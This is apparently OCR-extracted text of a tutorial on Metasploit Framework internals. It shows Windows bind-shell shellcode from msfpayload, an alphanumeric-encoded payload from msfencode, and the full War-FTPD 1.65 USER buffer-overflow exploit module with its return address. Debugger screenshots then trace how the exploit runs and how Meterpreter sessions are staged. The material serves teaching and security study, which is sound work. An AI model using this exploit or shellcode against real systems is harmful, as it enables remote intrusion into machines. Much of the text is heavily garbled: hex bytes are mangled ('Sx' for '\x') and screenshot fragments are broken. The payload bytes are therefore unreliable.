”Sx57Sxf f Sxd6Sx53Sx55Sxf f Sxd0Sx68Sxe5Sx49 Sx86Sx49Sx57Sxf f Sxd6Sx50" 
' ’Sx5 4Sx5 4Sx5 5 Sxf f Sxd0Sx9 3Sx6 8 Sxe 7Sx79 Sxc 6 Sx79 SxS 7Sxf f Sxd6 Sx5 5Sxf f " 
' ’Sxd0Sx6 6 Sx6 aSx6 4Sx6 6 Sx6 8 Sx6 3 Sx6 dSx8 9 Sxe 5 Sx6 aSx5 0Sx5 9 Sx2 9 Sxc c Sx8 9 ' ’ 
”Sxe7Sx6aSx44Sx89Sxe2Sx31Sxc0Sxf 3SxaaSxf eSx42Sx2dSxf eSx42Sx2cSx93" 
"Sx8dSx7aSx38SxabSxabSxabSx68Sx72Sxf eSxb3Sxl6Sxf f Sx7BSx44Sxf f Sxd6” 
"Sx5 bSx5 7Sx5 2 Sx5 1 Sx5 1 Sx5 1 Sx6 aSx01 Sx5 1 Sx5 1 Sx5 5 Sx5 1 Sxf f Sxd0Sx6 8 Sxad ' ’ 
' ’Sxd9 Sx05 Sxc eSx53SxffSxd6 Sx6 aSxf f Sxf f Sx37Sxf f Sxd0Sx8 bSx5 7Sxf c Sx8 3 ' ’ 
"Sxc4Sx64Sxf f Sxd6Sx52Sxf f Sxd0Sx68Sxf 0Sx8aSx04Sx5f Sx53Sxf f Sxd6Sxf f ” 
"Sxd0"; 


ftdninistratorPnotbingbutf at ~/f ranework 

$ ./nsfpayload uin32_bind LP0RT=31337 P 

"Sxf cSx6aSxebSx4f Sxe8Sxf 9Sxf f Sxf f Sxf f Sx60Sx8bSx6cSx24Sx24Sx8bSx45 " . 
"Sx3cSx8bSx7cSx05Sx78Sx01Sxef Sx8bSx4f Sxl8Sx8bSx5f Sx20Sx01SxebSxe3". 
"Sx30Sx49Sx8bSx34Sx8bSx01SxeeSx31Sxc0Sx99SxacSx84Sxc0Sx74Sx07Sxcl". 
' ’Sxc aSx0dSx01 Sxc 2 Sxe bSxf 4Sx3 bSx54Sx2 4Sx28 Sx75 Sxe 3 Sx8 bSx5 f Sx2 4Sx01 ' ’ . 
"SxebSx66Sx8bSx0cSx4bSx8bSx5f SxlcSx01Sxe bSx03Sx2cSx8bSx89Sx6cSx24". 
"SxlcSx61Sxc3Sx31Sxc0Sx64Sx8bSx40Sx30Sx8bSx40Sx0cSx8bSx70SxlcSxad”. 
"Sx8 bSx40Sx08 Sx5 eSx6 8 Sx8e Sx4e Sx0e Sxe c Sx50Sxf f Sxd6 Sx3 1 SxdbSx6 6 Sx5 3 " . 
' ’Sx6 6Sx68Sx33Sx32Sx68Sx77Sx73Sx32Sx5fSx54SxffSxd0Sx68SxcbSxedSxfc". 
"Sx3 bSx50Sxf f Sxd6Sx5f Sx89Sxe5Sx66Sx81SxedSx08Sx02Sx55Sx6aSx02Sxf f 
' ’Sxd0Sx6 8Sxd9Sx09Sxf5 SxadSxB 7Sxf f Sxd6 Sx5 3 Sx5 3 Sx5 3 Sx5 3Sx5 3 Sx43 Sx5 3 ” . 
"Sx43 Sx5 3 Sxf f Sxd0Sx6 6 Sx6 8 Sx7aSx6 9 Sx6 6 Sx5 3 Sx8 9 Sxe 1 Sx9 5 Sx6 8 Sxa4Sxl a ' ’ . 
"Sx70Sxc7Sx57Sxf f Sxd6Sx6aSxl0Sx51Sx55Sxf f Sxd0Sx68Sxa4SxadSx2eSxe9". 
"SxS?Sxf f Sxd6Sx53Sx55Sxf f Sxd0Sx68Sxe5Sx49Sx86Sx49Sx57Sxf f Sxd6Sx50”. 
' ’Sx5 4Sx5 4Sx5 5 Sxf f Sxd0Sx9 3Sx6 8 Sxe7Sx79 Sxc 6 Sx79 Sx5 7Sxf f Sxd6 Sx55Sxf f " . 
"Sxd0Sx6 6Sx6 aSx6 4Sx6 6 Sx6 8 Sx6 3 Sx6 dSx8 9 Sxe 5 Sx6 aSx5 0Sx5 9 Sx2 9 Sxc c Sx8 9 ” . 
"Sxe?Sx6aSx44Sx89Sxe2Sx31Sxc0Sxf 3SxaaSxf eSx42Sx2dSxf eSx42Sx2cSx93 ” . 
' ’Sx8 dSx7aSx3 8 SxabSxabSxabSx6 8 Sx72 Sxf eSxb3Sxl6SxffSx75 Sx44Sxf f Sxd6 ' ’ . 
"Sx5 bSx5 7Sx5 2 Sx5 1 Sx5 1 Sx5 1 Sx6 aSx01 Sx5 1 Sx5 1 Sx5 5 Sx5 1 Sxf f Sxd0Sx6 8 Sxad ” . 
"Sxd9Sx05SxceSx53Sxf f Sxd6Sx6aSxf f Sxf f Sx37Sxf f Sxd0Sx8bSx57Sxf cSx83". 
"Sxc4Sx64Sxf f Sxd6Sx52Sxf f Sxd0Sx68Sxf 0Sx8aSx04Sx5f Sx53Sxf f Sxd6Sxf f 
"Sxd0"; 


ftdnin ist catorPnothingbutf at ~/f raneuork 

$ ./nsfpayload win32_bind LP0RT=31337 R > payload 

RdninistratorPnothingbutf at ~/f raneuoi'k 
$ Is -1 payload 

-ru-r — i* — 1 Admin ist nkpassud 321 Jan 31 21:50 payload 

Admin istratorPnothingbutf 


'/f i-anewo rk 
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msfencode Options - 


ca ^/framework 


dn in istratorPnothingbut f at "/framework 

./msfencode -h 

Usage: ./msfencode <options> Cvar=vall 
pt ions : 

-i <file> Specify the file that contains the raw shellcode 

-a <arch> The target CPU architecture for the payload 

-o <os> The target operating system for the payload 

— t <type> The output type: perl, c, or raw 

-b <chars> The characters to avoid: 'Sx00\xFF* 

-s <size> Maximum size of the encoded data 

-e <encoder> Try to use this encoder first 
-n <encoder> Dump Encoder Information 
—1 List all available encoders 


-=-LgJ_*j| 


F 


r 




msfencode Results - 



e\ ^/framework 


ftdnin ist rat orPno thing but f at ~/f ranework 

$ ./msf encode -i payload -b ’\x00’ -e PexftlphaNun 
[*] Using Msf : : Encoder: : Pexfl lphaNun with final size of 717 bytes 
'’\xeb\x03\xS9\xeb\x0S\xe8\xf 8\xf f \xf f\xf f \x4f\x49\x49\x49\x49\x49' 
"\x49\xSl\xSa\xS6NxS4\xS8\x36\x33Nx30\xS6\xS8\x34\x41\x30\x42\x36' 
”\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34' 
"\x41\x32\x41\x44Sx30\x41\x44\xS4\x42Nx44\xSl\x42\x30\x41\x44\x41' 
”Sx56\x58Sx34\x5a\x38\x42\x44Sx4aSx4f Sx4d\x4eSx4f \x4c\x36\x4b\x4e' 
”\x4f \x34Nx4a\x4e\x49\x4f \x4f \x4f \x4f \x4f \x4f \x4f \x42\x36\x4b\xS8' 
”\x4e\x56\x46\x42\x46Sx32\x4b\x48\x4B\x44\x4e\xS3\x4b\x38\x4e\x37' 
'’\x4S\x30\x4a\x37\x41\xS0\x4f Sx4e\x4b\xB8\x4f \xS4\x4a\xSl\x4b\x38' 
”\x4f \x4SNx42\x32Sx41SxB0\x4b\x4e\x43\x4e\x42\x43\x49\x34\x4bSxB8' 
' '\x46 \x43 \x4b\xS 8\x41 \x50\x5 0\x4e \x41 \xS 3 \x42 \x4c \x49 \x59\x4e\x4a' 
"\x46\xS8\x42\x4c\x46\x37\x47\xS0\x41\x4c\x4c\x4c\x4d\xS0\x41\xS0 1 
"\x44\x4c\x4b\x4e\x46Sx4f \x4b\xS3Sx46\xBS\x46\x32\x4a\xS2\x4S\x37' 
"\x43\x4e\x4b\xS8\x4f \x4S\x46\x42\x41SxS0\x4b\x4e\x48Sx36\x4b\x48' 
"\x4e\x30\x4b\xS4Sx4b\xS8\x4f SxBB\x4eNx51\x41\x30\x4b\x4e\x43Sx30' 
"\x4e\x32\x4b\x38\x49\x38\x4e\x56\x46Sx32\x4e\x41\x41\x56\x43\x4c' 
”\x41\x33\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x43\x4b\x48\x42\x44' 
' '\x4e \x3 0\x4b\x3 8 \x42 \x47\x4e \x31\x4d\x4a\x4b\x3 8 \x42\x44\x4a\x50' 
"\xS0\x3S\x4aSxB6\xS0Nx38\xS0Sx34\xS0\x30\x4e\x4e\x42\x3S\x4f \x4f ' 
"\x48\x4dSx41\x33\x4b\x4d\x48SxS6\x43\xSS\x48Sx46\x4a\x46\x43\xB3' 
' '\x44\x3 3 \x4a\x36\x47\x47\x43 \x47\x44\x5 3 \x4f Sx3 S \x46 \x4B \x4f Sx4f ' 
”\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e\x4e\x4f\x4b\xS3\x42\xSS\x4f\x4f ' 
"\x48\x4d\x4f SxSS\x49\x38\x4BSx4e\x48SxB6\x41\x48\x4d\x4e\x4a\x30' 
"Sx44\x30\x4B\x4S\x4c\x46\x44\x30\x4f \x4f \x42Sx4d\x4a\xB6\x49Sx4d' 
’ ’\x49 \x3 0\x4S \x4f \x4d\x4a\x47\x35\x4f \x4f \x48 Sx4d\x43 \x45 \x43\x4S ' 
'’\x43\x4S\x43\xSSSx43\xSS\x43\x44\x43Sx4S\x43\x44\x43\x3S\x4f \x4f ' 
”\x42\x4d\x48\x36\x4a\x46\x4c\x37\x49\x46\x48\x46\x43\x3S\x49\x38' 
' '\x41 \x4e \x4S \x59\x4a\x46\x46 \x4a\x4c \x31\x42 \x47\x47\x4c \x47\x3 5 ' 
"\x4f \x4f\x48\x4d\x4c\x46\x42Sx31\x41\xSS\x4S\x4S\x4f\x4f \x42\x4d' 
"\x4a\xS6\x46\x4a\x4dNx4a\xS0Sx42\x49Sx4e\x47\x3B\x4f \x4f \x48\x4d' 
"\x43\x3S\x4B\x3S\x4f \x4f \x42\x4d\x4a\x36\x4S\x4e\x49\x44\x48\xS8' 
"\x49\xS4\x47\xSS\x4f \x4f \x48\x4d\x42\x4S\x46\x4S\x46\x4S\x4S\xSS' 
”\x4f \x4f \x42\x4dSx43Sx49\x4a\xB6\x47\x4e\x49\x37\x48\x4c\x49\xB7' 
”\x47\x3S\x4f \x4f \x48\x4d\x4S\x3B\x4f \x4f \x42\x4d\x48\x46\x4c\x46' 
"\x46\xB6\x48\xB6\x4a\x46\x43\x36\x4d\xB6\x49\x38\x4B\x4e\x4c\x46 1 
"\x42\xSS\x49\xSSSx49\x42\x4eSx4c\x49Nx48\x47\x4e\x4c\x46\x46\x34' 
"\x49\x48\x44Nx4e\x41\xS3\x42\x4c\x43\x4f \x4cSx4a\xB0Sx4f \x44\x44' 
”Sx4d\x32\xB0\x4f Sx44\x44Sx4e\xB2\x43Sx49\x4dSxB8\x4cSx47\x4a\x33' 
'’\x4b\x4a\x4b\x4a\x4b\x4a\x4a\xS6\x44\x37\xS0\x4f\x43\x4b\x48\x51' 
"\x4f \x4f \x4SSxB7\x46\x44\x4f Sx4f \x48\x4d\x4bSx3B\x47\x3S\x44\xSS' 
”\x41\xSS\x41\x3S\x41\xSS\x4c\xS6\x41\x30\x41\x4S\x41\xSS\x4S\xSB' 
' ’\x41 \x3 B \x4f \x4f \x42 \x4d\x4a\x46\x4d\x4a\x49 \x4d\x4B Sx3 0\xB 0\x4c ' 
'’\x43\x3S\x4f \x4f \x48\x4d\x4c\x36\x4f\x4f \x4f\x4f \x47\x43\x4f \x4f ' 
”\x42\x4d\x4b\x38\x4?\x4S\x4e\x4f Sx43\x48 \x46Sx4c\x46\xB6\x4f \x4f ' 
"\x48\x4d\x44\x3S\x4f Sx4f \x42\x4d\x4a\xB6\x42Sx4f \x4c\xB8\x46\x30' 
"\x4f \x3S\x43\xSS\x4f \x4f Nx48\x4d\x4f \x4f \x42\x4d\xSa”; 
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PAYLOADS 

SESSIONS 

os:: Win32 2 I Filter Modules | 

1 • 

Windows Bind DLL Inject 


1 « 

Windows Bind Meterpreter DLL Inject 


ffi 

Windows Bind Shell 
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Windows Bind VNC Server DLL Inject 
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Windows Execute Command 


1 « 

Windows Execute net user /ADD 
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Windows Recv Tag Findsock Meterpreter 



Setting msfweb Payload Options - 






Understanding the Framework - 

The Metasploit Framework is written entirely in object-oriented Perl. All code in the engine and base libraries is class - 
based, and every exploit module in the framework is also class-based.This means that developing an exploit for the 
framework requires writing a class; this class must conform to the API expected by the Metasploit engine. Before delving 
into the exploit class specification, an exploit developer should gain an understanding of how the 


engine drives the exploitation process; therefore, we take an under-the-hood look at the engine-exploit interaction through 
each stage of the exploitation process. 

The first stage in the exploitation process is the selection of an exploit. An exploit is selected with the use command, which 
causes the engine to instantiate an object based on the exploit class. The instantiation process links the engine and the 
exploit to one another through the framework environment, and also causes the object to make two important data 
stmctures available to the engine. 

The two data structures are the %info and %advanced structures, which can be 

queried by either the user to see available options or by the engine to guide it through the exploitation process. When the 
user decides to query the exploit to determine required options with the info command, the information will be extracted 
from the %info and %advanced data structures. The engine can also use the object information to make decisions. When the 
user requests a listing of the available payloads with the showpayloads command, the engine will read in architecture and 
operating system information from %info, so only compatible payloads are displayed to the user. 


Analyzing an Existing Exploit Module - 

Knowing how the engine works will help an exploit developer better understand the structure of the exploit class. Because 
every exploit in the framework must be built around approximately the same structure, a developer need only understand 
and modify one of the existing exploits to create a new exploit module . 

Example - 

Metasploit Module 

1. package Msf : :Exploit: :iis40_htr; 

2 . use base "Msf :: Exploit " ; 

3 . use strict ; 

4 . use Pex::Text; 



Metasploit 
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msfconsole ^ 
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[fl]! Project 

msf (~/msf) 

► L_J data 

► Cj documentation 

► CD external 

► CD lib 

► ED modules 

► CD plugins 

► E3 scripts 

► CD spec 

► CD test 

► CD tools 

® armitage 
i CONTRIBUTING. md 
i COPYING 
§) Gemfile 
Hi Gemfile. lock 
H HACKING 


© 4 = ' 


B db_manager.rb [?) arguments. rb ® dispatcher_shell.rb 


® core.rb 


S command_dispatcher.rb 


® scriptable.rb 


® credcollect.rb .*] module_manager.rb 
x [jr] meterpreter.rb * ® base.rb 


print_line 

end 


9 Executes a script in the context of the OlRtSEPCG&fLC session. 
.$ * 

def cind_run(*a is) 

Fi if args. length = 0 

cmd_run_help 
return true 
ti end 


9 Get the script name 

begin 

script_name = args. shift 

9 First try it as a Post module if we have access to the 
9 Framework instance. If we don't, or if no such module exists, 

9 fall back to using the scripting interface. 

if (msf_loaded? and mod = client. f ramework. modules. create(script_name)) 

originaljnod = mod 


Debug msfconsole 


-ii |^] Console Debugger 

► ♦ 

+ MMMNS 

MMMNI 

& E? 

m i 

=13 & "MMMMT 

= MMMNI MMMMM 

[ T" (T MMMNI MMMMM 


MMMNI MMMMMMMN 
MMMNI MMMMMMMMMf 
MMMNI MMMMMMMMMf 


M 

V # 

X 

1 ® 

> 

INI 


MMMMM jMMMM 
MMMMM jMMMM 
MMMNI MMMNM MMMMMMM MMMMM jMMMM 


MMMMR ?MMNM 
MMMMNm ‘ ?MMM 
MMMMMMN ?MM 


MM? NMMMMMN 


MMMMNNMNMMMMMNx 


eMMMMMNMMNMM 

MMMMMMNMMNMMNM 


MMMMMMMMNMMNMMMMm+ . . +MMNMMNMNMMNMMNMM 


| ^ Debug l: ;3 6 TO DO 9) 9: Changes 
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Debug: y msfconsole | t 

9 [^1 Console Debugger 
^ '111 Frames 

A # Thread 1 [sleep] (pid 583) 


! * O 


9 * 

# 

□□ 

if 

'* 

x 

<a 


h initialize [handler. rb:75] (Msf::Handler) 


ll initialize [bind_tcp.rb.38J (Msf::Handler::BindTcp) 

©initialize [ windows. rb:32 ] (Msf::Payload::Windows) 

© initialize [bind_tcp.rb:59J (Metasploil3) 

© initialize [reflectivedllinject.rb:41] (Msf::Payload::Windows::ReflectiveDlllnject) 
© initialize [meterpreter_options.rb.13J (Msf::Sessions::MeterpreterOptions) 

© initialize [meterpreter.rb:39J (Metasploit3) 

©create [module_set.rb.62] (Msf::ModuleSet) 

©create [module_manager.rb:89] (Msf::ModuleManager) 

© exploit_simple [exploit.rb.84J (Msf::Simple::Exploit) 

©exploit_simple [exploit.rb:162] (Msf:.Simple::Exploit) 

S cmd_exploit [exploit.rb.148J (Msf::Ui::Console::CommandDispatcher::Exploit) 
©cmd_exploit [exploit.rb:148] (Msf::Ui::Console::CommandDispatcher::Exploit) 
© run_command [dispatcher_shell.rb:428] (Rex::lli::Text::DispatcherShell) 

© run_single [dispatcher_shell.rb:390] (Rex: Ui::Text::DispatcherShell) 

© run_single [dispatcher_shell.rb:384] (Rex::Ui::Text::DispatcherShell) 

© run [shell.rb:200J (Rex::Ui::Text::Shell) 

© msfconsole: 148 


§i Variables -*■ Watches 

► $ Global variables 
▼ |§ info = Hash (14 element(s)) 

► ii 'Arch' = Array (1 element(s)) 

► *1 'Author' = Array (3 elements)) 

'Convention'->sockedi 

'Description'-> Listen for a connection, Inject the meterpreter server 
'Handler*->{Module) Msf::Handler::BindTcp 

► *i 'License' = Array (1 element(s)) 

'Name'->Windows Meterpreter (Reflective Injection), Bind TCP Stagei 

► ii'PayloadCompat' = Hash (1 elements)) N 

► *i 'Platform' = Array (1 element(s)) 

► §§ 'References' = Array (1 elements)) 

'Session'->{Class} Msf::Sessions::Meterpreter_x86_Win 

► |i 'Stage' = Hash (2 element(s)) 

► J| 'Stager' = Hash (3 elements)) 

'Version'->SRevision: 14774 S, {Revision: 15548 S, {Revision: 14E 
3 Rex::Syr»c::Event = (Class) Rex: :Sync:: Event 





Vulnerable Service - 


The vulnerable service we are going use to explore the internals of Metasploit is the War-FTPD FTP server. 
The metasploit exploit for the warftpd can found in the /modules/exploits/windows/ftp/ 
warftpd 165 user .rb file. 


require 'msf/core' 

class Metasploit3 < Msf :: Exploit :: Remote 

Rank = AverageRanking 

include Msf: : Exploit: : Remote: : Ftp 

def initialize (inf o = {}) 

super (update_info (info, 

'Name' => 'War-FTPD 1.65 Username Overflow', 

'Description' => %q{ 

This module exploits a buffer overflow found in the USER command 
of War-FTPD 1.65. 

}, 

'Author' => ' Fairuzan Roslan <riaf [at] mysec.org>', 

'License' => BSD_LICENSE , 

'References' => 

[ 

[ 'CVE', '1999-0256'], 

] , 

' Def aultOptions ' => 

{ 



' EXITFUNC ' => 'process' 

}, 

' Payload ' => 

{ 

' Space ' => 424 , 

'BadChars' => " \x0 0 \x0a\x0d\x4 0 " , 
' StackAdj ustment ' => -3500, 

' Compat ' => 

{ 

' ConnectionType ' => "-find" 

} 

}, 

'Platform' => 'win', 

' Targets ' => 

[ 

# Target 0 


# Target 2 

[ 

'Windows XP SP2 English', 

{ 

'Ret' => 0x71ab9372 # push esp, ret 

} 

] , 

] , 

' DisclosureDate ' => 'Mar 19 1998')) 
end 



def exploit 
connect 

print_status ( "Trying target #{ target . name }..." ) 

but = make_nops ( 600 ) + payload . encoded 

buf[485, 4] = [ target . ret ].pack('V') 

send_cmd( ['USER', but] , false ) 

handler 

disconnect 

end 

end 


Set command - 

To see how the parameters required to exploit the vulnerability are initialised set a break point on thecmd set 
method declared in the msf : :ui : : ConsoieDispatcher : : Core class. Assuming that use command has 
been already executed type set rhost 172 . 16 . 134 . 130 at the msf prompt and hit return. 

The program halts on the break point. Stepover the lines of code to see how the entered parameters are stored 
on the active module datastore. After retrieving the datastore from the active module the name and the value of 
the parameter are extracted from the argument string before storing the new parameter into the datastore. 



b m ® t> <* 

[^1 Project 

msf (~/msf) 
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msfconsole ▼ | [> $5> ofiS* l§] B§? i : ® 

[V warftpd_165_user.rb * exploit. rb |V encoded_payload.rb & module. rb [j] event_dispatcher.rb 
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► E 2 documentation 

► Ea external 

► Cj lib 

► Ea modules 

► Ea plugins 

► Ed scripts 

► EElspec 

► Ed test 

Debug 1* msfconsole 


# Set the supplied name to the supplied value 
name = args[0] 

value = argsl 1, args. length- 1 ] .join ( ’ ') 

assnsEEiCMi 


I <9 # Different targets can have different architectures and platforms 

# so we need to rebuild the payload list whenever the target 
£ # changes. 

@cache_payloads = nil 

[u end 
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^Thread 1 [sleep] (pid 433) 


zJ 


^ cmd_set [core.rb:1781] (Msf::UI::Console::CommandDispatcher::Core) 


jj| run_command ldispatcher_shell.rb:427J (Rex::Ui::Text::DispatcherShell) 
© run_single ldispatcher_shell.rb:389] (Rex::Ui::Text::DispatcherShell) 

IlS) run_single ldispatcher_shell.rb:383] (Rex::Ui::Text::DispatcherShell) 

© run [shell.rb:200J (Rex::Ui::Text::Sbell) 

© msfconsole: 148 


X 




& Variables 

▼ §§ args = Array (2 element(s)) 

® [0] = TARGET" 

H ID = “2" 

▼ M datastore = {Msf::ModuleDataStorel Msf::ModuleDataStore (17 elemends)) 

d 'ConnectTImeout' = "10" 

Id 'DisablePayloadHandler' = "false" 
d 'EnableContextEncoding' = "false" 
d 'EXITFUNC - "process" 
d 'FTPDEBUG' = “false" 
d 'FTPPASS' = "mozilla@example.com" 
d 'FTPTimeouf = "16“ 
d 'FTPUSER' = "anonymous" 
d 'PAYLOAD' = "windows/shell/bind_tcp” 
d 'RHOST' = "172.16.134.130" 
d'RPORT' = "21" 
d 'SSL' = "false" 
d 'SSLVersion* = “SSL3" 
d 'TCP::max_send_size' = "0" 
d TCP-send.delay 1 = "0" 
d 'VERBOSE' = 'false" 
d 'Wfs Delay' = "0" 


I & 5: Debug 6: TODO 9: Changes 


Exploit The Target 

Exploit begins by using the connect method to connect to our target host. The exploit uses a Metaslpoit 
module method called print status to print status information to wherever is receiving output, to print a 
connect message. Next, the exploit builds the exploit buffer. Finally the exploit sends the payload buffer by 
calling the send_cmd method to send a user command. The false option indicates that we don’t care what 
data is returned. 

The handler method handles the connection from the shell running on the target machine, and the disconnect method 
disconnects us from the vulnerable service. 




Debug -L^ msfconsole #- 

-ii Console Debugger ^== Co ""o *"5 o* : H 

^ (igl Frames M Variables ^ Watches 


J ■# Thread 1 [sleep] (pid 1227) t| ♦ O 


| i§! connect [tcp.rb:120] (Msf: :Explott::Remote::Tcp) 


^ I ©connect [ftp.rb:55) (Msf: Exploit: Remote:. Ftp) 

_ © exploit [warftpd_165_user.rb:86] (Metasploit3) 

□n 4gjjob_run_proc [exploit_driver.rb:206] (Msf ExploitDriver) 

~~ a Q run [exploit_d river. rb: 166] (Msf::ExploitDriver) 

I © exploit_simple (exploit.rb:137] (Msf: :Simple:: Exploit) 

$ © exploit_simple ( exploit. rb: 162 ] (Msf: :Simple:: Exploit) 

^ ©cmd_exploit [exploit.rb:148] (Msf: Ui: Console::CommandDispatcher::Exploit) 
•@lcmd_exploit [exploit.rb:148] (Msf::Ui::Console::CommandDispatcher::Exploit) 
?l 33 run_command ldispatcher_shell.rb:427) (Rex::Ui::Text::DispatcherShell) 
@irun_single ldispatcher_shell.rb:389] (Rex::UI::Text::DispatcherShell) 

3| run_single ldispatcher_shell.rb:383] (Rex::Ui::Text::DispatcherShell) 

© run (shell.rb:200] (Rex::Ui::Text::Shell) 


^ dossl = false 
^ global = true 

► i) Global variables 

► ^ nsock * {Socket) #<Socket:0x007fc33cc864d0> 
liopts = Empty Hash 

^ Rex:: Socket: :Tcp = (Module) Rex::Socket::Tcp 

► 3 self = (Msf Modules::Mod6578706c6f69742f77696e646f77732f6674702f776 No watches 


Send USER command with encoded payload. 
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■A & Thread 1 [sleep] (pid 1227) 
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i® raw_send (ftp.rb:303) (Msf:: Exploit:: Re mote:: Ftp) 


©send_cmd lftp.rb:164] (Msf::Exploit::Remote::Ftp) 

© exploit l warftpd_16S_user.rb:93 ] (Metasploit3) 

IQ job_run_proc (exploit_driver.rb:206] (Msf. ExploitDriver) 

Q run [exploit_driver.rb:166] (Msf::ExploitDriver) 

@ exploit_simple (exploit.rb:137J (Msf::Simple::Exploit) 

5Siexploit_simple [exploit.rb:162] (Msf::Simple :Exploit) 

3 cmd_exploit lexploit.rb:148] (Msf::Ui::Console::CommandDispatcher::Exploit) 
© cmd_exploit [exploilrb:148] (Msf::Ui::Console::CommandDispatcher::Exploit) 
>13 run_command ldispatcher_shell.rb:427] (Rex::Ui::Text::DispatcherShell) 

Q run_single ldispatcher_shell.rb:389] (Rex::Ui::Text::DispatcherShell) 

33 run_single [dispatcher_shell.rb:383] (Rex::Ui::Text::DispatcherShell) 

I© run (shell.rb:200J (Rex::Ui::Text::Shell) 


-+■ S Variables v 

f $ Hand = "USER^y\u 0011 ^J^t"^^gr^^Su\u 0014 B^fG^w=^\ 
(d Global variables 

3 nsock - {Socket} #<Socket:0x007fc33d8d4278> 

^ self = (Msf :Modules::Mod6578706c6f69742f77696e646f77732f6674) 

@1 @active_timeout = 120 
1 @arch = Empty Array 
1 @author = Array (1 element(s)) 

1 @autofilter_ports = Array (2 element(s)) 

! @autofilter_services = Array (1 element(s)) 

H @banner = "220- Jgaa's Fan Club FTP Service WAR-FTPD 1.65 Ready 
^ @datastore = {Msf::ModuleDataStore} Msf::ModuleDataStore (20 elem 
^ @default_target = nil 
H @fail_reason = "none" 

H @ftpbuff = “ 


L 


& Watches -»■ 

► § buf = (NameError 
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□a 

if 
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P 5 ! Console Debugger ^2 Co ""o *"5 M 

© Frames 

| •& Thread 1 [sleep] (pid 1227) 


'll! disconnect [rcp.rb:179] (Msf: : Exploit:: Re mote ::Tcp) 


53) exploit lwarftpd_165_user.rb:96] (Metasploit3) 

©job_run_proc [exploit_driver.rb:206] (Msf::ExploitDriver) 
run [exploit_driver.rb:166] (Msf::ExploitDriver) 

©exploit_simple [exploit.rb:137] (Msf;:Simple::Exploit) 

I® exploit_simple [exploit.rb:162] (Msf::Simple::Exploit) 

cmd_exploit lexploit.rb:148J (Msf::Ui::Console::CommandDispatcher::Exploit) 
Q cmd_exploit [exploit.rb:148] (Msf::Ui::Console::CommandDispatcher::Exploit) 
© run_command [dispatcher_shell.rb:427] (Rex::Ui::Text::DispatcherShell) 

© run_single [dispatcher_shell.rb:389J (Rex::lli::Text::DispatcherShell) 

© run_single [dispatcher_shell.rb:383J (Rex::Ui::Text::DispatcherShell) 

© run l shell.rb:200 J (Rex::Ui::Text::Shell) 

©msfconsole: 148 
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Establish Session - 


Debug £* msfconsole 

4 Console Debugger ^2 Co ""o 15 o* *♦! H 

^ © Frames -»* 

H | (fi» Thread 1 [sleep] (pid 1810) i ) ; ♦ O 


cmd_sesslons [core. rb: 1440] (Msf::Ui::Console::CommandDlspatcher::Core) 


£l run_command [dispatcher_shell.rb.42 8} (Rex Ui: Text : DispatcherShell) 

_ ©run_single [dispatcher_shell.rb:390 ) (Rex::Ui::Text::DispatcherShell) 

□§ ©run_single / dispatcher_shell.rb:384 ] (Rex::Ui::Text::DispatcherShell) 
ri - j cmd_exploit [exploit.rb:181] (Msf. : Ui: :Console : :CommandDispatcher: :Exploit) 
' z © cmd_exploit [exploit.rb.181] (Msf::Ui::Console::CommandDispatcher::Exploit) 
$ © run_command [dispatcher_shell.rb:428] (Rex::Ui::Text::DispatcherShell) 

^ 23 run_single / dispatcher_shell.rb:390 ] (Rex::Ui::Text::DispatcherShell) 

© run_single [dispatcher_shell.rb:384] (Rex::Ui::Text::DispatcherShell) 

® © run lshell.rb:200] (Rex::Ui::Text::Shell) 

©msfconsole: 148 


Interact With Target 


*- 


y Variables -*■ 

§?■ Watches -»■ 

► $ Global variables 

► y buf = (NameError 

y lOError = (Class) lOError 


► y nsock - (Socket) #<Socket0x007fc33d8d4278> 


▼ y self = [Msf::Modules::Mod6578706c6f69742f77696e646f77732f6674; 


[H @active_timeout = 120 


i§ @arch = Empty Array 


► i| @author = Array (1 element(s)) 


► i| @autofilter_ports = Array (2 element(s)) 


► i| @autofilter_services = Array (1 element(s)) 


H @banner = ”220- Jgaa's Fan Club FTP Service WAR-FTPD 1.65 Ready 


► M @datastore = (Msf::ModuleDataStore) Msf::ModuleDataStore (20 elem 


y @default_target = nil 


[a] @fail_reason = "none" 


O @ftpbuff = "" 



+ - 


§ Variables -• 

3 S! = nil 

3 "Exception = (Class) Exception 
3 "Interrupt - (Class) Interrupt 

► y @@sessions_opts * {Rex::Parser::Arguments} #<Rex::Parser::Arguments: 

► i| args = Array (3 element(s)) 
il cmds = Empty Array 
M EOFError - (Class) EOFError 
*1 extra = Empty Array 

► ’i) Global variables 
y lOError = (Class) lOError 
M method = nil 

y Msf::Sessions::CommandShell = (Class) Msf::Sessions::CommandShell 
y Msf::Sesslons::Meterpreter = (Class) Msf::Sessions::Meterpreter 
y quiet = false 

, + 


Watches 

► y buf = (NameError 





Meterpreter - 

The type of payload we discussed in the previous section give us a command shell which can provide some 
useful commands, but it has number of limitations. These include: 

□ The creation of a new process - which can trigger the intrusion detector 

□ Limitation on the number of commands available 

□ Can’t work in a chroot environments 

As well as overcoming these limitations Meterpreter also has the facility to allow the attacker to extend its 
functionality which can provide the attacker with arsenal of weapons. 

Meterpreter can be divided into number of components, these include: Meterpreter payloads, Client side 
components, Server side components, Server extensions and the Protocol connecting the client side and the 
server side. 



Meterpreter payloads - 

Meterpreter payloads are staged. The stage part of the payload can found in 

/ modules / payload/ stages/ windows / meterpreter . rb directory while for the Stager, we have choice of 
bind_tcp or reverse_tcp. For our analysis we will choose bind top stager. 


So for the windows/meterpreter/bind tcp payload we have the stage 

/modules/payloads/ stages/windows/meterpreter . rb and the Stager 

/modules/payloads/ stagers/windows/bind_tcp . rb and the stager is controlled by its corresponding 
script in the / lib/msf / core/handler/bind_tcp . rb . 
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© Frames 

i# Thread 1 [sleep] (pid 583) i } ♦ 


'fSs initialize [handler. rb:75] (MsfiHandler) 


© initialize [ bind_tcp.rb:38 ] (Msf::Handler::BindTcp) 

©initialize [windows. rb:32] (Msf::Payload:: Windows) 

© initialize [bind_tcp.rb:59] (Metasploit3) 

© initialize [reflectivedllinject.rb:41] (Msf::Payload::Windows::ReflectiveDlllnject) 
© initialize [meterpreter_options.rb: 13] (Msf::Sessions::MeterpreterOptions) 

© initialize [meterpreter.rb.39] (Metasploit3) 

©create [ module_set.rb:62 ] (Msf::ModuleSet) 

© create [module_manager.rb:89] (Msf::ModuleManager) 

©exploit_simple [ exploit.rb:84 ] (Msf::Simple:: Exploit) 

